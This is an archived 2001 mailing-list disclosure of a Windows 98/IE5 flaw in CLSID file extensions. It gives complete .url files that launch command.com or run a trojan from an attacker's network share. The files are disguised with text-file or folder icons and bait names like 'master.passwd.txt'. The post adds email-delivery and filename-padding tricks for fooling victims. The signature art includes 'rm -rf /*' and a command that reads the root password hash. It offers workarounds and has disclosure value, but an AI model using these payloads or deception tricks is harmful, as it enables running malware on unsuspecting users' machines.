-----BEGIN PGP SIGNED MESSAGE----- There is a possibility to run program(e.g. trojan) without confirmation and even without a suspicion... Exploring registry I've found 2 interesting CLSID's: the first one is CLSID of .lnk file .lnk file: {00021401-0000-0000-C000-000000000046} I wouldn't stop on this 'cause it's binary file and if you have certain utils, U can try to find smth. useful out of this. I found much more easier way to use CLSID bug, and here it is, CLSID of .url file... .url file: {FBF23B40-E3F0-101B-8488-00AA003E56F8} If someone create file, e.g. ==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ==== [InternetShortcut] URL=file://c:/command.com ========================= END OF FILE ========================= Double-click on this file in explorer will cause launching MS-DOS Prompt. But... in explorer that file will have icon of .url file. There is a way to fix it. And it can be done adding some lines to the file. Now the file looks like this: ==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ==== [InternetShortcut] URL=file://c:/command.com IconIndex=-152 IconFile=shell32.dll ========================= END OF FILE ========================= Now the file in explorer will be visible with normal .txt-file icon (you can change IconIndex and/or IconFile for other icon), and when someone clicks on it he thinks that's normal text file, but as the result of double-clicking MS-DOS Prompt will pop-up, without any confirmations(!!!). But that's not all... If hacker is on the same network with possible victim (or he has an access to the computer on victim's network), there is possibility to run the hacker's program directly from the network. For this purpose he can use the following file ==== master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ==== [InternetShortcut] URL=file://ourcomp/ourshare/path/to/trojan.exe IconIndex=-152 IconFile=shell32.dll =========================== END OF FILE ========================== Where ourcomp is the name of hacker's computer on the victim's network, ourshare is the name of shared folder on that computer, and as U can guess path/to is path to trojan.exe on that share. And after double-clicking guess what MS Explorer will do ??? CORRECT !!! It'll run trojan.exe WITHOUT ANY CONFIRMATIONS !!!! Now if hacker will be so smart to write trojan-program that will do some crazy things and create a file master.passwd.txt (without CLSID) on victim's computer and open it with notepad, victim won't even have a suspicion of the trick ;-) Tested on Win98, IE5.0 I don't know how IE would behave if that file will be accessed from <a href="...">, but I tried it on localhost this way: in IE location bar I've typed "file://X:/XPL/CLSID/master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA00 E56F8}", and... IE executed trojan.exe ;-). From <a href="..."> it didn't work. WORKAROUND 1. View file properties before opening any innocent-looking files in explorer (not realistic) 2. Remove from registry all CLSIDs of .url and .lnk, but this may cause system to work improperly. 3. Do not use explorer to open files. You can use Far Manager, Windows Commander, etc as I do. > Yet while valid the vulnerabilities are not particularly > threatening. For the vulnerability to be exploited an attacker must > somehow place a file somewhere the user is likely to find it and > somehow entice him to "open" it by clicking on it. That's why an attacker should name files master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8}, or tsomething like that. But there is even more dangerous way, we can name our file passwords.{FBF23B40-E3F0-101B-8488-00AA003E56F8} and change it's icon to the icon of Folder, so the victim would think, she's opening Folder. If we place the file on out shared folder, and then somehow invite the victim to that share (e.g. to download Document.doc). If the victim is curious, she'll notice folder "passwords", and would go to see the passwords ;-) Here are some scenarios by Elias Levy(aka Aleph One): > I can think of a couple of scenarios were this may be possible. The > most appealing is one were an attacker has obtained access to a > file server used by the user and places a malicious file in the > share. If the user finds the file and opens it the attack can > leverage his acess to the file server into access to the victims > machine. > > Another scenario may be to use some vulnerability that allows an > attacker to create, but not execute or overwrite other files, in a > victims machine. He can place the file on the vicstims machine via > the vulnerability but must wait for him to open the file. > > Another scenario may transfer the file into a victims machine via a > email message. The attacker may be able to fool the mail client not > to display the full file name of the file, which the victim then > saves, and opens. Maybe we can use the trick of padding the file > name with spaces between the "txt" and ".{..." parts so that the > filename is truncated when displayed to the user. And here are some scenarios by me: If I know the victim(I mean, that I know her e-mail, and I've got at least one letter from the victim), then I can check X-Mailer in the headers of victim's letters. Now, if I'm sure, that victim uses The Bat!, then I use this scenario: I send e-mail to the victim with attached trojan.exe. Completely clear, that victim will delete that message, but... that file(trojan.exe) will remain on victim's computer until the message will be deleted from Trash-folder. And all attachments of this type(non-text) are stored in the following folder on victim's machine: C:\Program Files\The Bat!\Mail\Victim's Name\Attach\ So, now I can use file with CLSID-extension to run program C:\Program Files\The Bat!\Mail\Victim's Name\Attach\trojan.exe on victim's machine. If the victim uses Outlook Express, you cn use aleph1's trick with spaces between the second extension. But... Outlook will show: 1. Icon of file as Internet Shortcut 2. all spaces and CLSID extension when victim will try to open it. The other trick is to place spaces before the entire name of file, in my case the file was named big2.txt.{...CLSID...}, and I've placed 58 spaces, so Outlook showed it like "big2.txt...". I don't think this is the usage of CLSID bug, 'cause this way we can send any .exe file, etc... By the way, if there will be a lot of spaces before the name of file, explorer begins to do some crazy things: 1. It doesn't show the name of file(spaces) 2. After selecting the file and switching from explorer - to explorer, it shows the name of file e.g. master.passwd.txt)not in the selected region, but nearly 30 pixels lower. And then when you drag that file, the name will remain on the same place ;-)) I'll try to find out some tricks with .lnk CLSID, so bye for now... EnJoY ! with Best regards, [Co]Proc, procat_private brought 2 U by [HtR]team, teamat_private: EforeZZ - eforezzat_private, The LNU, Lviv, Ukraine [Co]Proc - procat_private, The KPI, Kiev, Ukraine ........................ ....:::::[ hAck tHe rEaLitY ]:::::.... ...::::::::::::::::::::::::::::::::::::::::::::... _____ __.-- - - [HtR] team - - --.__ _______ _ \___/..::::::::::::::::::::::::::::::::..\___/ _ _____/ \____ the reality can be hacked ____/ \_______ \__ the trouble is to __/ \__ find out HOW? __/ \______________/ ________________/ \____________________ |$ ./a.out -x 20 | | [HtR]team | |# rm -rf /* || | teamat_private || |________________|| | [Co]Proc || ----------------+ | coprocat_private || | EforeZZ || | EforeZZat_private || |____________________|| --------------------+ [ 25 packets sent, 0 packets received, 100% packet loss ] # grep root /etc/master.passwd|cut -d: -f2|write root -----BEGIN PGP SIGNATURE----- Version: PGP 6.5i iQEVAwUBOuZeevKsruSZV1VvAQH5/Qf/YmS/uNrJbfJxPbxAvkMSSq+sy216D8s5 Uf9A6Dh9RrPjQJw8/hXqwhM/2ZsdtE0R87LhtRr0DBd+4WHoQfK/lXdp++VcBU6N x6GKfnYf+vsn8Ei+0YbXqm+oMC7axaYDf2+UI84zUw/uyJ+kKxOrn8ekUKhK/Rvq UMOPMYG2qGKyqY/Ue/fDjkH4PcbF9di4a1KlPstn4+7f9tr2YHGkXOJeLnM2cIPF MqwSt3BzrzuvF4CB/f2lmRF7T7+bh4f3arXEyNudDLdOYuQlOHOLuTHIYRq4oG0z PJnSX/rPQNVo3dmjvgoQu9hXWit6lOedriAsi3sK55eNiBPgLsOQCg== =q/Sq -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 19:02:28 PDT